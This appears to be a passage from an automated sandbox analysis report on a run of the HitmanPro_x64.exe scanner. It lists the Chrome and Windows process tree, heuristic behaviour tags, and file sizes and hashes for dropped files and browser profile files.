                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1596,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2188 /prefetch:3
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2000
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2360,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2524 /prefetch:8
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:6348
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3200 /prefetch:1
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1476
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3468 /prefetch:1
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:3904
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4504,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4540 /prefetch:1
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4416
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5236,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5268 /prefetch:8
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5208
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5520,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5356 /prefetch:1
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:992
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3656,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3460 /prefetch:1
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2236
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3608,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5704 /prefetch:1
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:6624
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3924,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3056 /prefetch:1
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2336
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5728,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5712 /prefetch:8
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2968
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3632,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5996 /prefetch:8
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:3324
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3572,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6184 /prefetch:8
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:5768
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4708,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6168 /prefetch:8
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5880
                                                                                                                                                                                                  • C:\Users\Admin\Downloads\HitmanPro_x64.exe
                                                                                                                                                                                                    "C:\Users\Admin\Downloads\HitmanPro_x64.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                    PID:6048
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\HitmanPro_x64.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\HitmanPro_x64.exe" /update:"C:\Users\Admin\Downloads\HitmanPro_x64.exe"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:6744
                                                                                                                                                                                                      • C:\Users\Admin\Downloads\HitmanPro_x64.exe
                                                                                                                                                                                                        "C:\Users\Admin\Downloads\HitmanPro_x64.exe" /updated:"C:\Users\Admin\AppData\Local\Temp\HitmanPro_x64.exe"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Impair Defenses: Safe Mode Boot
                                                                                                                                                                                                        • Unexpected DNS network traffic destination
                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                        • Maps connected drives based on registry
                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                        PID:6840
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:7072
                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5992
                                                                                                                                                                                                    • C:\Program Files\HitmanPro\hmpsched.exe
                                                                                                                                                                                                      "C:\Program Files\HitmanPro\hmpsched.exe"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:3872
                                                                                                                                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                      "C:\Windows\system32\taskmgr.exe" /0
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:1504
                                                                                                                                                                                                      • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                        C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5580
                                                                                                                                                                                                        • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                          C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:6168

                                                                                                                                                                                                          Network

                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                          • C:\Program Files\HitmanPro\hmpsched.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            151KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            b817392977b6299b7e8d4ea987bed151

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            2ba96b781d40d52b39e21a778396b68bdb0b20fc

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            6571045bf36233335d44cb6a726a573e15adf2c454d8d00de47f06aa0cbe28a4

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            e384d0f325bd070d822e9151ecb594f517df0f43105559e1a11929157706db7faabd91709729520fb64967707a5992c0df6b284474d01b11935377df4aef9a55

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\6447e98a-d109-4c90-8355-debb4b5af13f.tmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            414B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            20602f84f51ad872939744fc86b392d9

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            89cee22339ca16a386cbb2fbd679c96d07dcdec2

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            ef9c793618eb49347547af92a885f456001a4cba6fd28ff7d6a8f592acb74043

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            6deed52220a44128555fe74faa44886e2b154aa3deeaf77e7f477f580a61fd25f0198d9e2c64de63e700cc7d919086212b76aab0aefbca8d31eb7022213cd83f

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            984B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            580b81047864ea0a108eb01bffef312a

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            a815a8212a7363bf52c48dda6b214d49117a6d44

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            36dfe4a1f584199d59247bf4383fd6af29ce2f6996cc5571963eaa32cf33f904

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f0a0435e21c304de2800bfff4fefcd184ad2b42fba5aed4c9710a34d5dffcf5e26bb5e735eab202a985e42f3dfed847404af680a609b6ce74ddf77f195a3a90b

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            28KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            bb2e242c8fb8114f586f5e62cb3e660f

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            3c06efb9ad8227a4bf576176429a882daf1964c7

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            86dbfa38c9a81bf8c80dc82df82d0e80dbf21e08e5fcc663c2c03043aa60a34e

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            857ee6bc8395065d9aa866972e9e18d700a0fcab2ca31db902f711c0259849746edd2ea2f32638d2716b1ce1345fd9d19a0abf26d438d894c58af19e07f15254

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            6KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            d183b28aed5ab3c2570637947428ccf7

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            9eb9e8c86c7cc5acd086bbc9108a144e5f7397b5

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            3d7c3b0ddbe0d55610d53adb64019c9883a24ff23ad9791d6f01e9d8ea0892f7

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            a1296df0b6b971ed2232b5f2b06376ebb0dd75a0e45025ef183ad0dbd0ff67404deedc0c3c7ba6e942ac013954f42d23a5f215600abdb0d60ac2179f52a48e47

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            2B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            d751713988987e9331980363e24189ce

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            10KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            9bf2dcb636830747ad17411d2378738b

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            f8b0c46652bafdf42971765f65be3ccf6f7a6dc8

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            1abc5c07f6c5132a778ace79e25c624444d7f37e4af4ef05f4e74108aeb506d0

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            009d7e32faec9c301060d2068375c5c98b804d05644985d9de52f536de33fc6c10cfb75dab795ba89d345624e24922240d3c69504b302d75416728c592c576cb

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            9KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            b6f5094a41ec4ede905517ce7b05ccff

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            e7290448a81f6a9d6e65f8cc4f9be7647c350e08

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            5e81c4f6a8152bb8a8be4cc3dab9faa40191d63e01fd1cb82df8b9b9c569f58b

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            419816b9f07819deb3c335d2238f0c45fab8484bd3f2c17d82b5cbf2cec1ca879090bc0e5c4150a8d990e0baf0f6667ed8c0a91696ae65e432a69551a32c7959

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            10KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            10e82c06a5f1d1e82947a7ef7dc935c1

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            160709f9f8ed75f4be1a908e3109989f042b3115

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            54a4696320888370090d2330c6076187cda3ec59908625bf92b2ab99041aaa7a

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            42a2a217d707ef2c48403ec355feaffed8d37d60a3e31ac2910ff0ace2c6195230a6c34627d1788fb9637a8c84c2f6d9b8c7f3adb684de68954e22a260ce8c9b

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            9KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            58145384ac2cd93cb57ce39cc4f4f36e

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            261d4ac8f38cf5bb6f92563e33d7ec42de7e2b68

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            f2277ed788464b5fa9b78d53e581ac1c58611ce734d676e3f81f1b760ce1dc2b

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            3218b001f7963581b703cc18f48c4aba1a577cac9f2152993de6a9f5d049b4fcb45f0bde5db1f68419b2f2c53be6604af856d97d9d28a71a25fee9ad07efbe2c

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            130KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            35ead4f02e823379634b931c52c5a94f

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            550e4a9c6251da5353df83982ea159ba4a8b867d

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            e91f48ffe1db51f792f4d674ab7c446a7a005a3957853d89fe1dffa720938579

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            847c7f835bdf2285f269611ffedadc430b5f1184f23ab94671cfe25430e9210248471a44da7ab8ac3ff5b09de00e3bbec3c5735b728e0dafc7e2dad267d82894

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            80KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            8d60da178ae167e2cc9eae1841af599e

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            83f4cbd3d424b43e79abf0e675e5d484d2c87064

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            12bbea3dcda084603d2856c97f80b3359e3f360538d1a48d58cb11b7a6b4b089

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            a154a2c159ceaf56f4ced5e634321fa71bdfb1e2545cebeec18cd1dd6d6657b43a80f7ef591807672dd4139636e68787218c464ebc9f4d7b1fb1aa7020b835fd

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            156KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            83b4ab698fdbf5ad3b47bb460c2578ea

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            5df8f234d335765df1ac4989472a6e635cb49a15

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            751675c65a0c527a45c54388daa84403da8cd7dceb409d660e827017dcd4e3e6

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            cacf9db66ff79dfde7bda314f846b2c547346d2c7917524f36343a8ef87b2a0b0d0a61ad301dfe3d6332f05e9135bbae15b631dc4ebf406cbb2cd360c8e35eef

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            156KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            50d122c2b9103fc1df621f8bdd0cae07

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            15ddb3c29c8406d40de95153226ee0102812fb96

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            e179c0a17f31f5ce25f2722431ef1147af485e1cd19a0e24e2b685f9c7e43c39

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            7d52c09b7f8a1690a03fa59b848db6d306642265649e1e633580f45d6b85667babcca043b0d707a073f18c163ac16e14427a38d7a47ba9a4b861eb3de3dcce03

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            1034b84388e91ee01e288fe596b6f00e

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            62a08d81a0e460d5de576a02f4b8f38c7f05b154

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            a096647d271e1b2cd4c45493aecda38a14a373f8eac667adf56da1218c1256b2

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            719f23fb968b5ae5bf7b5e540d27f17381cf5d3dbf0dcd9dd85fdf6e8ad7baeff10757d2c9ca56af909a17644c9035916745bb62afe2801c7fd6ace1def63a65

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            05b9da61d0b8cb52839b09c507eb9a52

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            5a2ad4e4852c6127e0bc2cc974a0622d07516aef

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            e762024d26bd7378096c07fa380e071bc6a16cd14022734ba44af0bf758e98fa

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            006904db941ecf85a5d4602c8b19b934057446121f8cf5d8282abffd4fd92e8b08a94c6c97a79715ab307a757c7b0bf988cea0f72b14a3f4e80ae30831db1fe3

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            fb5ed2f305fc58bed2e92b50bf762cbc

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            21b961cef3132f6dcac9db9ef755730f71701ba7

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            90bed22e4fbc200e0a8fe013d32e5f1955b75c2a2f310932c99b375ad32b6b6f

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f2f9a34e2c06f0b7bdde47e036b121ab4d4f9bf7d8e1df701f84600215209f4e7de2313833afacce4d05130318354c517548ae362b138550e85ea4da58a05e86

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            04e26ee97b04376e772f817fba0fdc6a

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            3034dc7bc9f40974d9c1910f5531252359352f25

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            04bd7c898b5b07f69517df55743a463ce9a9db8f44ef393f9462fae3c24aec5d

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            cda959f76d2f83d6370948921aaf8fc6481dd7c4ff932b472625672218bda11a20ee7dc15e06a0a2592f551d810a665c0de525b3ccee895827ac243f8cc0b6ad

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            e97252b7f22ea5c681dfa9b22e2ebb58

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            efd6ee1d2c26455e3e916031748d538472c21947

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            db6a4ae5c01bf1a328b82144efa5505b51d37d5fd66e076b459ebf8d8dedffa0

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f2648f096e94349a45ab85aaa18e18e4f48400bffc82624275bc2bac0ca84f6cff5fd5b5835ff17e115af199bb3b913cff0214d47454290a252ca28b695124b4

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            8db76137f3d66c4a2a7e8b1c3dc8b43f

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            5851dc78ba493ce537d80135d4450595e9214c37

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            a150b1d08cc061fd43c7505506cdba3211f803a48d683915ceec0e8bb14fc644

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            bd521a1dfaf6206952b1c736a478a467571e9469c5f72cdda5626194fe25b9a2439771238a613c5a2939ab3953915d9e154ca6f437f7377cad3c2d7eb6ad05ab

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            7254dc087313cdcfb3932a6be79b9282

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            660ab4886effaed2f972bfb7f3f7c3696cf7053e

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            72541df751f85c7fee57ecbd121936e7990f0c2010dca170a2990c85a34fd293

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            76686aea10b3920c142643559e2e5e009ec0b7e2630e9871fb6b9238ad65752591708d1a1fd99ff423ad3aff7967bf3b364341510aa5a7734a948b42e59afe28

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            64B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            a5418db5685c8e4c32eaed1e60b03625

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            6395c6ecd584dbb8eb176fb2e1c2bed4c91f8db4

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            7bcd3c9a0f9181edd883bd63cc14d8824868784437e9bb7774b2b59e21e77d79

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            8a60cb806514e5090ead75334409559a887092ab58ca52f693025a2c78b21a75029c1590348b493374d1d7bdd155f35660edbb93b4ff587917d56a66cacee91d

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            5e22dd1cda88782a1f52f76e748ef957

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            3231826619a06fa541e2bfb21da445bd7013b5ac

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            73302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            75039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\HitmanPro_x64.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            13.6MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            42abb8549f480b30b37547d6e067f782

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            5f589e8e919a89202be252ac27912c570e8b4f97

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            fdfaaec7db564b9ba4660f618c85c82fd39322e91133e7f5c93c23c85f834cf5

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            6be19840cbeab4d8f8a62e4718c547167a708e40d59ac1180601bd82a4007ec6131c6f1e3e745cad181f9b5c41f76b8ab1918637946ad80ec02bedc962ce2854

